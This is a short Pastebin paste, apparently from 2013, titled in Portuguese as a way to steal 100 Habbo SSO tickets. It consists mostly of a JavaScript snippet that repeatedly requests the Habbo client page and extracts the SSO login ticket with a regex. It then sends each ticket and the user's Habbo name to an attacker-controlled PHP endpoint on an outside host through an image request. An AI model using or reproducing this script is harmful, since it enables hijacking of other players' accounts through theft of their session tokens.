nPhoenix

[Habbo] Roubar 100 SSO's + CTK

Feb 3rd, 2013
549
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. sso_num = 100; //número de sso's que você quer
  2. for (i = 0; i <= sso_num; i++) {
  3.     new Ajax.Request(/client/, {
  4.         onComplete: function (x) {
  5.             sso = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  6.             new Image().src = 'http://seusite.com/ctk.php?sso=' + sso + '&habbo=' + habboName;
  7.         }
  8.     });
  9. };
Advertisement
Add Comment
Please, Sign In to add comment